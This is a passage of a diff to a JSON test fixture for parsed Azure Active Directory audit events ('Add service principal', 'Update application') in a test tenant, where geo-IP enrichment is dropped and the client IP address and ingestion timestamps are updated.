\\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -14487,25 +13245,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -14519,7 +13259,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -14662,7 +13402,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -14674,12 +13414,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036472800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125243700Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -14705,25 +13445,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -14737,7 +13459,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -14842,7 +13564,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -14854,12 +13576,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036478700Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826392\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"aaa361ac-50e8-43f4-9aaf-c19c09e3e3bc\",\"ModifiedProperties\":[],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125248800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826392\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"aaa361ac-50e8-43f4-9aaf-c19c09e3e3bc\",\"ModifiedProperties\":[],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -14885,25 +13607,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -14917,7 +13621,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -15031,7 +13735,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -15043,12 +13747,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036483200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"V